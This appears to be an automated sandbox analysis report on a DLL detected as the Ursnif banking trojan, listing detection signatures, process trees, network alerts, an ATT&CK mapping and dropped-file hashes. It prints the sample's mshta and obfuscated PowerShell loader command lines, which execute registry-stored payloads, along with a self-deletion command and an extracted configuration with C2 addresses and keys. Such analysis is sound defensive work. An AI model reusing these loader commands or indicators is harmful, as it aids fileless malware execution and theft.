Windows
Analysis Report
VoevdOQpeU.dll
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Writes to foreign memory regions
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 1428 cmdline: loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
- cmd.exe (PID: 1796 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
- rundll32.exe (PID: 5292 cmdline: rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- control.exe (PID: 6956 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- rundll32.exe (PID: 7132 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
- WerFault.exe (PID: 3084 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- WerFault.exe (PID: 5640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- WerFault.exe (PID: 4144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 6532 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- powershell.exe (PID: 6612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 6788 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 6804 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- csc.exe (PID: 6844 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 6920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cmd.exe (PID: 4432 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- PING.EXE (PID: 5388 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- cleanup
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Nikita Nazarov, oscd.community: |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Florian Roth: |
Source: | Author: juju4, Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113: |
Timestamp: | 04/23/22-08:12:19.910177 04/23/22-08:12:19.910177 |
SID: | 2033203 |
Source Port: | 49766 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/23/22-08:12:21.823792 04/23/22-08:12:21.823792 |
SID: | 2033203 |
Source Port: | 49766 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/23/22-08:11:59.593120 04/23/22-08:11:59.593120 |
SID: | 2033203 |
Source Port: | 49760 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/23/22-08:12:20.776897 04/23/22-08:12:20.776897 |
SID: | 2033203 |
Source Port: | 49766 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_049F3072 |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_0580FCC0 | |
Source: | Code function: | 2_2_0580CE21 | |
Source: | Code function: | 2_2_05805A14 |
Source: | Code function: | 2_2_0580591B |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | Process created: |
Source: | ASN Name: |
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_049F4CC6 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | Code function: | 2_2_049F3072 |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | Static PE information: |
Source: | Process created: |
Source: | Code function: | 2_2_049F821C | |
Source: | Code function: | 2_2_049F198A | |
Source: | Code function: | 2_2_049F475F | |
Source: | Code function: | 2_2_058184D9 | |
Source: | Code function: | 2_2_05808FA6 | |
Source: | Code function: | 2_2_058237F4 | |
Source: | Code function: | 2_2_05801E50 | |
Source: | Code function: | 2_2_0581C3A9 | |
Source: | Code function: | 2_2_05820B0E |
Source: | Code function: | 2_2_0581488B |
Source: | Code function: | 2_2_049F3A9C | |
Source: | Code function: | 2_2_049F4695 | |
Source: | Code function: | 2_2_049F25D7 | |
Source: | Code function: | 2_2_049F8441 | |
Source: | Code function: | 2_2_05815D9D | |
Source: | Code function: | 2_2_0581F5FF | |
Source: | Code function: | 2_2_05815CA1 | |
Source: | Code function: | 2_2_058144A5 | |
Source: | Code function: | 2_2_05801C78 | |
Source: | Code function: | 2_2_0581312E | |
Source: | Code function: | 2_2_058212F1 | |
Source: | Code function: | 2_2_0581AD9E | |
Source: | Code function: | 2_2_0581B628 | |
Source: | Code function: | 2_2_0581264B | |
Source: | Code function: | 2_2_05815188 | |
Source: | Code function: | 2_2_058029B2 | |
Source: | Code function: | 2_2_0581C1C2 | |
Source: | Code function: | 2_2_0580A085 | |
Source: | Code function: | 2_2_05815830 | |
Source: | Code function: | 2_2_05801B92 | |
Source: | Code function: | 2_2_05807A1E |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Code function: | 2_2_049F6DB6 |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | File read: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_049FB301 | |
Source: | Code function: | 2_2_049F821B | |
Source: | Code function: | 2_2_049F7E29 | |
Source: | Code function: | 2_2_05812C1B | |
Source: | Code function: | 2_2_058237F3 | |
Source: | Code function: | 2_2_058232B9 |
Source: | Code function: | 2_2_0580A513 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: |
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_0580FCC0 | |
Source: | Code function: | 2_2_0580CE21 | |
Source: | Code function: | 2_2_05805A14 |
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_0580591B |
Source: | Binary or memory string: | ||
Source: | Code function: | 2_2_0580A513 |
Source: | Process token adjusted: | Jump to behavior |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_0580BE55 |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior |
Source: | Process created: | |||
Source: | Binary or memory string: | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Code function: | 2_2_049F12D3 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_05804DF5 |
Source: | Code function: | 2_2_049F5410 |
Source: | Code function: | 2_2_049F515F |
Source: | Code function: | 2_2_049F12D3 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Remote Access Functionality |
---|
Source: | File source: | ||
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 413 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 413 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
38% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
146.70.35.138 | unknown | United Kingdom | | 2018 | TENET-1ZA | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 614287 |
Start date and time: | 2022-04-23 08:10:43 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 16s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | VoevdOQpeU.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 43 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 1 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.evad.winDLL@29/23@0/2 |
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.42.16, 20.189.173.21, 52.168.117.173
- Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6532 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
08:11:55 | API Interceptor | |
08:12:10 | API Interceptor | |
08:12:34 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
146.70.35.138 | Get hash | malicious | Browse | ||
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TENET-1ZA | Get hash | malicious | Browse |
⊘No context
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5a7bdef4ffd6df7a7664cf7158b49db77a1e6c9_7cac0383_164b3f26\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8484271078729315 |
Encrypted: | false |
SSDEEP: | 96:8xnXzFGeUnYyQy9haot7Jn4pXIQcQac6pcEccw35+a+z+HbHg+AS/YyNlISWbSmH:8RzoneH0tGtjLq/u7sZS274ItW |
MD5: | AC7F4345BC16B046B4BD7A4B49FAD9DE |
SHA1: | 31DB96A77E8C9352345D2D35BDD922C5A989733E |
SHA-256: | 0FE9F258A2E001391DD7FE936ED71F39F02E4A21502048E07AD9AFF57D5D9B8A |
SHA-512: | F029D90D1FE667A52F3ECD173F11501CA11E15159116660080259EA0F562063CD60BA96DEE65A25CC56E7BBCED3D62E93FDE77354CFF4B959ABF6E7EDDC92DC6 |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5f68951fc85ec886a9cff2e6302d69913a8368e_7cac0383_107353c7\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8450263074663521 |
Encrypted: | false |
SSDEEP: | 96:86XqFfeUnYyGy9haTKzfopXIQcQac6FcElcw3d+a+z+HbHg+AS/YyNlISWbSm9mK:8aqFnoHEBPBjLq/u7sZS274ItW |
MD5: | E3453784F5987FFC4297D68B3E5806EC |
SHA1: | 8AE5D7F0D9E1EDD426FD57793895BF06C7D55090 |
SHA-256: | A19FAA5C0A3344576E5CA6B3D224AF727B5260220821BFD197D80F502CC5D9FC |
SHA-512: | FEDF432EFCB2E02D4F617DBEC17EFD457DA47CE6D4AC7040046C4696A1CB7D78E1D2F57F0E7E44C6B2E4ADFDD4B1900F4350B8B0DFCFE51F01448A96D011F5D8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 39506 |
Entropy (8bit): | 2.072438553320638 |
Encrypted: | false |
SSDEEP: | 192:J54NgWJJkH67dJ+OIKcUcXyK7UbBDaNCQSxtledkyhmWlzwkEFsdw:3LWT7j5IjU4yK7UbBDaMQ6tledkytK |
MD5: | C917F1742DC83F5A043197F2F54A0C4E |
SHA1: | AACA0FC29708705FDBB4F63CC4E9962D0EC5E3EF |
SHA-256: | 142F090B56F1D4E7F37963F99E41AAD407C6F3C1F845BC0915A7EFF81C662889 |
SHA-512: | 61CE862EBD1E02188B5920FA6A57B7269CC4B69FE874AF24C8EB589484EC9B08B540D6E4550CA540686700FAB1A8BC6065D34B9DD7F7DDFF68E5E1E6D68004A6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8340 |
Entropy (8bit): | 3.69846117157985 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiN/6idq06Y43SUHqgmfJSP+prQ89bgW2TsfkAm:RrlsNiF6W6YoSUKgmfJS2gW24fy |
MD5: | 03FE517493CDA2DA9A9CB5CF3B51E3C8 |
SHA1: | 6DAA111381E6A2BA15D14F385ECD9EE1E680EE70 |
SHA-256: | 088A2319CDDC0633C74897267FED482A3F4602182B6757D5E276C4283FAA5988 |
SHA-512: | 2097EA78A64D0674A3B8CA2D51A0229B07993A46B876B48F168F926A802EDD16BE710F9EFEB5CA1B5468D0F5E26299ED049E44074A9923C903CAD0A66D567DBC |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.468439994201981 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zs6JgtWI9PnWgc8sqYjhP8fm8M4J2+EZFI+q849hGpKcQIcQw0kd:uITfIoWgrsqY1UJKErGpKkw0kd |
MD5: | 1F581D2D671323001820EEC345955E8D |
SHA1: | 84D57DE07A1A92920A775FD9A2EF441FD6D55EDC |
SHA-256: | F3C1719825384E2811940641C8F25B5C7C9A8CF7FDFF96C79BD1B7094C66BDC1 |
SHA-512: | E435C1E51CFA9E549F043F8BE4DA0878D52CAA517CC84E732A0800404F08FCC0EE1566E386E3B198C6E254997C8707CD2ED5AF4131285373A55FCFE4191FBF2C |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 36062 |
Entropy (8bit): | 1.9519178024623962 |
Encrypted: | false |
SSDEEP: | 192:b5fZJJkHYyfKOIKcmk2QSxksjVaYHbiJjmJmRsK:9h4VIjmk2Q6ksjYUmX |
MD5: | B26D761700EC27A85A7E8306F7D9C1CD |
SHA1: | 26BA946FC504E3B720545A54C6166E6A2841B1FC |
SHA-256: | A4A981D31AF326622D356EB84A53F327157F52F7EFB02CADB292060F7810FE72 |
SHA-512: | 3205B01478F80D692A1735122340421C8868EF2150ACB96AFFB58777B301034BF223260BF04B93CCDA2F160E29DA10286CD50E4077D174CBEDA5750449E600C3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8300 |
Entropy (8bit): | 3.69036741286865 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiNx6ihq06Y4YSUfPgmfRSO+pDn89b3dW2Tsf3lFm:RrlsNiL6q6Y3SU3gmfRSitW24fe |
MD5: | C80DFEB2FD09E96D80A105BF1416186F |
SHA1: | C2E029A858E8ED96BB46CEB163704C526428BB15 |
SHA-256: | B3CE25563BAB4D09351E626D47559203FC2F9E73F43D27AD95C8222BBF41688F |
SHA-512: | 785520C461DF2D2ABFFD907C65A3656B50232434394EA4CE68D02BBC5569D2D3EB307DA67ADCD9C9CE8FD99F9FC0AA888E4456CF642EA1AC3E72D14B7C470FD5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4564 |
Entropy (8bit): | 4.439548228059502 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zs6JgtWI9PnWgc8sqYjhx8fm8M4J2+voFI+q84acupKcQIcQw0kd:uITfIoWgrsqY1WJVBO/pKkw0kd |
MD5: | DF03F167543BFE5B6CDEF17CD6CDB700 |
SHA1: | 6BBC61B7DBF6EB32A530D87A971944CDD312120D |
SHA-256: | 84B755FD6CFD16130CE8987B8BBE160B50DAB6E97F05AB376C74909198264B80 |
SHA-512: | 504C3F517AFEBFE84B4641320FCCB9107C42081F8A6A8672E073F46341DF6CF43569F29E69B8623EC2F86F32A92262FD58EB57FBA10F4F81EACBD4AD6E3E719E |
Malicious: | false |
Preview: |
